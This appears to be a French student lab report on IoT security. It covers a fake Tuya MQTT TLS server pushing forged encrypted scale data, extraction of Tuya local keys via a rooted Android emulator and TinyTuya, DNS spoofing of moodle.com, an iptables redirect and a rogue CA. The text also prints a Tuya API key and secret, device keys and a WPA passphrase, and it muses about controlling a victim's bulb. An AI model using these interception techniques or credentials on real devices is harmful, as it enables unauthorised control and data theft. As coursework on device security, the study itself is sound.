print(f"Packet MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur connexion : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>

On cherche dans le fichier shared_prefs situé dans /data/data/com.nedis.smartlife sur la VM Android une clé locale qui permettrait de chiffrer le message pour que Nedis l'accepte.<syntaxhighlight lang="linux-config">
emulator64_x86_64_arm64:/data/data/com.nedis.smartlife/shared_prefs # grep -r "localKey"

./sig_mesh_storage.xml: <string name="sig_mesheu176237y8062605m7Ddzpr3a6d803edeb314f364c55d2caab540918">[{"appkey":"2FC5C9F42A44F9D243F960231C370DC6","code":"mebf11e37fc6632a9b44qg","endTime":0,"ivIndex":0,"key":"mebf11e37fc6632a9b44qg","localKey":"674d29fb978a1705","meshId":"mebf11e37fc6632a9b44qg","meshKey":"2FC5C9F42A44F9D243F960231C370DC6","meshkey":"2FC5C9F42A44F9D243F960231C370DC6","name":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","netWorkkey":"D8FBEEA2F2B93F4B63EFD7DA83424BA9","password":"fa1667ca872e46d4","pv":"2.1","resptime":0,"share":false,"startTime":0,"tempShare":false}]</string>
</syntaxhighlight>Je vais apprendre plus tard que cette clé est une clé qui permet de sécuriser l'échange Bluetooth entre la balance et le téléphone lors de la première connexion. Mais avant de le savoir, j'ai tenté d'améliorer le faux serveur avec cette clé.<syntaxhighlight lang="linux-config">
#!/usr/bin/env python3
import socket
import ssl
import time
import json
import struct
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# ================= CONFIG =================
CERT_FILE = "/etc/ssl/apache/ssl/tuya.crt"
KEY_FILE = "/etc/ssl/apache/ssl/tuya.key"
PORT = 8883

# LOCAL KEY 16 caractères
LOCAL_KEY = b"674d29fb978a1705"

# DPS balance (poids correct pour Nedis)
DPS_POIDS = {
"1": 8050, # 80.50 kg
"2": 1, # stable
"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Je pense que, pour faire fonctionner cette méthode, il faut absolument que je trouve la clé qui crypte le message pour que Nedis l'accepte quand il le reçoit.

J'ai donc cherché dans cette direction et j'ai découvert deux choses.

Premièrement, TinyTuya, une API Python pour les appareils intelligents Tuya (génial, Nedis utilise Tuya) WiFi utilisant une connexion directe au réseau local (LAN) ou le cloud (API TuyaCloud). TinyTuya permet entre autres de récupérer la fameuse clé.

Ensuite, j'ai découvert la plateforme IoT de Tuya qui permet, en connectant son application de téléphone sur le site, de jouer avec ses appareils Tuya pour une connexion avec Home Assistant ou encore... TinyTuya !

Spoiler alerte: J'ai du changer d'application et cette application ne tape plus sur la même adresse. Elle tape sur XX-eu.lifeaiot.com il a donc fallu refaire une redirection vers notre serveur pour ces nouvelles adresses.

Spoiler alerte: j'ai la clé. Je parle plus de TinyTuya dans la prochaine partie car même avec cette clé, ce faux serveur ne marche pas. Je vais donc tenter d'autres pistes.

== TinyTuya ==
Dans cette partie, nous allons tenter de connecter notre balance à notre faux serveur en utilisant l'utilitaire TinyTuya. Le but est de récupérer le poids de l'utilisateur de la balance lorsqu'il se pèse.

Dans un premier temps, il a fallu connecter l'appli à la plateforme IOT de Tuya. L'application "Nedis Smartlife" de Nedis, qui utilise bien la même base que l'application Smartlife de Tuya (oui oui, c'est le même nom…), ne veut pas se connecter à la plateforme pour une raison inexplicable (et, au vu du nombre de forums qui parlent du sujet, je ne suis pas le seul).

J'ai donc dû connecter ma balance sur l'appli Smartlife qui a bien voulu se connecter à la plateforme.

Cela me permet de récupérer avec TinyTuya les périphériques

Et je vais maintenant tenter d'expliquer le fonctionnement de TinyTuya étape par étape…

Déjà, pourquoi connecter l'application avec la plateforme IOT de Tuya --> Cela permet à l'appli de récupérer les appareils connectés de mon application, elle va générer un ID et une clé.

Et comment faire pour que TinyTuya ait accès aux appareils --> grâce à la commande <code>python -m tinytuya wizard</code> qui va prendre l'ID et la clé pour récupérer les appareils.

Ensuite la commande suivante va permettre à TinyTuya de détecter nos appareils qui sont effectivement connectés à notre réseau :<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya devices
TinyTuya (Tuya device scanner) [1.17.4] Loaded devices.json - 1 devices: Device Listing [
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {} } ]
</syntaxhighlight>Et là, magie, on obtient la clé de la balance, on va pouvoir enfin récupérer le poids de notre utilisateur grâce à ce code Python qui écoute la balance:<syntaxhighlight lang="python">
import tinytuya

DEVICE_ID = '84853100a4e57c162d4c'
IP_ADDRESS = '172.16.10.105'
LOCAL_KEY = 'V[z^Gr|qekh]9z_>'

# Connexion à l'appareil
d = tinytuya.Device(DEVICE_ID, IP_ADDRESS, LOCAL_KEY)

d.set_version(3.3)

# Récupérer le statut
data = d.status()
print("Statut complet :", data)
</syntaxhighlight>Évidemment cela ne fonctionne pas. Et pourquoi ? Et bien si l'on regarde dans le bloc <code>python3 -m tinytuya devices TinyTuya</code> ci-dessous, on observe que le champ mapping est vide. Ce champ est censé afficher toutes les données que TinyTuya est censé pouvoir récupérer… et il est vide…

Soit je suis à l'origine de ce problème, soit TinyTuya ne permet pas de changer nos ampoules connectées en rouge si la balance affiche que notre objectif de poids est dépassé…

Affaire à suivre.

<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard -force
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n):

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "D\u00e9tecteur de fum\u00e9e",
"id": "86730270483fda3155d0",
"key": "r@fAdR'PW~0O`v5@",
"mac": "48:3f:da:31:55:d0",
"uuid": "86730270483fda3155d0",
"sn": "1000716370419B",
"category": "ywbj",
"product_name": "Smoke detector",
"product_id": "inwnovped8h5aoaw",
"biz_type": 18,
"model": "WIFIDS20WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/651af99cad24017128e3dc2322461ae5.png",
"mapping": {
"1": {
"code": "smoke_sensor_status",
"type": "Enum",
"values": {
"range": [
"alarm",
"normal"
]
}
},
"14": {
"code": "battery_state",
"type": "Enum",
"values": {
"range": [
"low",
"middle",
"high"
]
}
}
}
},
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {}
}
]

>> Saving list to devices.json
2 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
Scan network 172.16.10.0/24 from interface eth0? ([Y]es/[n]o/[a]ll yes):
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
0 local devices discovered

Polling local devices...
[Détecteur de fumée ] Error: No IP found
[Pèse pas que des personne] Error: No IP found

>> Saving device snapshot data to snapshot.json

Done.

</syntaxhighlight>De plus, on constate que notre balance n'est pas détectée dans les appareils locaux et ce même si je suis sur la balance. Pourtant le poids transite bien vers les serveurs !

Ma théorie est que la balance ne se connecte au wifi qu'au moment d'envoyer le poids et les informations corporelles vers les serveurs. Cette action doit être assez rapide pour que TinyTuya ne la détecte pas.

Pour confirmer mes dires, j'ai pris l'une des trois ampoules connectées Nedis que j'ai configurées dans mon application.

Et là, on constate dans le bloc suivant que le champ mapping de l'ampoule n'est pas vide ! Il y a des possibilités d'action à transmettre ou à recevoir.<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n): n

Enter API Key from tuya.com: g5wufknjhcwqkkpsrgug
Enter API Secret from tuya.com: edac1effd9374f50b6c61ddd2ea1e734
Enter any Device ID currently registered in Tuya App (used to pull full list) or 'scan' to scan for one: bf85da6b2eccef5784rydz

Region List
cn China Data Center (alias: AY)
us US - Western America Data Center (alias: AZ)
us-e US - Eastern America Data Center (alias: UE)
eu Central Europe Data Center
eu-w Western Europe Data Center (alias: WE)
in India Data Center
sg Singapore Data Center

Enter Your Region (Options: cn, us, us-e, eu, eu-w, in, or sg): eu

>> Configuration Data Saved to tinytuya.json
{
"apiKey": "g5wufknjhcwqkkpsrgug",
"apiSecret": "edac1effd9374f50b6c61ddd2ea1e734",
"apiRegion": "eu",
"apiDeviceID": "bf85da6b2eccef5784rydz"
}

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "Ampoule Connect\u00e9e",
"id": "bf85da6b2eccef5784rydz",
"key": "ZO:}y#{'gM.QuI|T",
"mac": "10:5a:17:a9:b5:6f",
"uuid": "b73f1a854ac4219e",
"sn": "830-2-20148D",
"category": "dj",
"product_name": "Smart bulb",
"product_id": "mdzqw8qjfzfdjz9n",
"biz_type": 18,
"model": "WIFILRW10E27",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/9a70929a5f5c1855c1c091ab404b8319.png",
"mapping": {
"20": {
"code": "switch_led",
"type": "Boolean",
"values": {}
},
"21": {
"code": "work_mode",
"type": "Enum",
"values": {
"range": [
"white",
"colour",
"scene",
"music"
]
}
},
"22": {
"code": "bright_value_v2",
"type": "Integer",
"values": {
"min": 10,
"max": 1000,
"scale": 0,
"step": 1
}
},
"23": {
"code": "temp_value_v2",
"type": "Integer",
"values": {
"min": 0,
"max": 1000,
"scale": 0,
"step": 1
}
},
"25": {
"code": "scene_data_v2",
"type": "Json",
"raw_values": "{\"scene_num\":{\"min\":1,\"scale\":0,\"max\":8,\"step\":1},\"scene_units\": {\"unit_change_mode\":{\"range\":[\"static\",\"jump\",\"gradient\"]},\"unit_switch_duration\":{\"min\":0,\"scale\":0,\"max\":100,\"step\":1},\"unit_gradient_duration\":{\"min\":0,\"scale\":0,\"max\":100,\"step\":1},\"bright\":{\"min\":0,\"scale\":0,\"max\":1000,\"step\":1},\"temperature\":{\"min\":0,\"scale\":0,\"max\":1000,\"step\":1},\"h\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":360,\"step\":1},\"s\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1},\"v\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}}}",
"values": {
"scene_num": {
"min": 1,
"scale": 0,
"max": 8,
"step": 1
},
"scene_units": {
"unit_change_mode": {
"range": [
"static",
"jump",
"gradient"
]
},
"unit_switch_duration": {
"min": 0,
"scale": 0,
"max": 100,
"step": 1
},
"unit_gradient_duration": {
"min": 0,
"scale": 0,
"max": 100,
"step": 1
},
"bright": {
"min": 0,
"scale": 0,
"max": 1000,
"step": 1
},
"temperature": {
"min": 0,
"scale": 0,
"max": 1000,
"step": 1
},
"h": {
"min": 0,
"scale": 0,
"unit": "",
"max": 360,
"step": 1
},
"s": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"v": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
}
}
}
},
"26": {
"code": "countdown_1",
"type": "Integer",
"values": {
"unit": "s",
"min": 0,
"max": 86400,
"scale": 0,
"step": 1
}
},
"28": {
"code": "control_data",
"type": "Json",
"raw_values": "{\"change_mode\":{\"range\":[\"direct\",\"gradient\"]}, \"bright\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}, \"temperature\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}, \"h\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":360,\"step\":1},\"s\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":255,\"step\":1},\"v\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":255,\"step\":1}}",
"values": {
"change_mode": {
"range": [
"direct",
"gradient"
]
},
"bright": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"temperature": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"h": {
"min": 0,
"scale": 0,
"unit": "",
"max": 360,
"step": 1
},
"s": {
"min": 0,
"scale": 0,
"unit": "",
"max": 255,
"step": 1
},
"v": {
"min": 0,
"scale": 0,
"unit": "",
"max": 255,
"step": 1
}
}
},
"30": {
"code": "rhythm_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"31": {
"code": "sleep_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"32": {
"code": "wakeup_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"41": {
"code": "remote_switch",
"type": "Boolean",
"values": {}
}
}
}
]

>> Saving list to devices.json
1 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
1 local devices discovered

Polling local devices...
[Ampoule Connectée ] 172.16.10.108 - [On] - DPS: {'20': True, '21': 'white', '22': 1000, '23': 1000, '25': '000e0d0000000000000000c80000', '26': 0, '41': True}

>> Saving device snapshot data to snapshot.json

>> Saving IP addresses to devices.json
1 device IP addresses found

Done.

</syntaxhighlight>Maintenant que l'on sait que l'ampoule est adressable via TinyTuya, il serait intéressant de récupérer uniquement la clé et de retenter de créer un serveur python sur le réseau local qui contrôle l'ampoule sans que l'utilisateur de l'ampoule ne l'ait voulu.

Ensuite, il faudrait trouver une méthode pour récupérer la clé sans TinyTuya, car si l'on reste dans une idée de "hack", la configuration de TinyTuya nécessite d'avoir accès au compte Tuya de la personne que l'on souhaite hacker.

Une possibilité est d'écouter la communication Bluetooth entre le téléphone de l'utilisateur et son ampoule lors de la première configuration. Il est probable que ce soit à ce moment que la clé permettant d'accéder au serveur est communiquée.

SE5 IdO sécurité des objets 2025/2026 b1

2026-01-24T08:54:45Z

Vdetrez : /* Première tentative */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi et sécurisation WiFi par WPA2-PSK (29/09) =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sur le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommée CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du PC qui est simulée comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois-ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps, j'ai donc routé mon téléphone avec l'utilitaire Magisk en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque démarrage du téléphone le certificat en question.

